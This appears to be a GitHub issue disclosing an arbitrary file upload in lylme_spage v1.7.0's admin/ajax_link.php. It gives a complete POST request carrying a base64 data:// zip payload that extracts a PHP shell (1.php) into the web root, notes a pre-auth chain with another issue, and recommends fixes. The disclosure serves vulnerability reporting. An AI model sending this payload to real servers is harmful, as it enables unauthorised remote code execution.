Although this is a backend vulnerability, the Pre-Auth chain to upload shell can be implemented in conjunction with #32
POST /lylme_spage-master/admin/ajax_link.php?submit=update HTTP/1.1
Host: host
Connection: close
Cookie: admin_token=ec2a3HYAaqQws10zQfeSJaDeJN1aI2gOnV9BLpaHNYdb2hHPQ9nYkoMzuOuQIokfoyJRVcVNK3aT8JUZXq5WSPqTBQ;
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
file=data://text/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
2.After submit the request, the shell 1.php will be extracted to the ROOT dir.
2.Expected behaviour
The code snippet as shown meant to update system from zip compress package.
3.Actual behaviour
Howerver, audit the code depth, found that the extracted $RemoteFile can passed any malicious data, and then release to ROOT Dir via zipExtract function directlty.
4.Affected Version
this Vuln Affect latest Version: lylme_spagev1.7.0
LyLme
commented
1 year ago
Upload Shell Vulnerability in ajax_link.php
1.Steps to reproduce
1.Access http://host/admin/ajax_link.php?submit=update via POST method and carry the follw data, the injection point is
filefield within HTTP Body.2.After submit the request, the shell 1.php will be extracted to the ROOT dir.
2.Expected behaviour
The code snippet as shown meant to update system from zip compress package.
3.Actual behaviour
Howerver, audit the code depth, found that the extracted
$RemoteFilecan passed any malicious data, and then release to ROOT Dir viazipExtractfunction directlty.4.Affected Version
this Vuln Affect latest Version: lylme_spagev1.7.0
5.fixes Recommendations
For fix this vuln, Here is my advices:
1.Delete this function point
2.Limit decompression file suffixes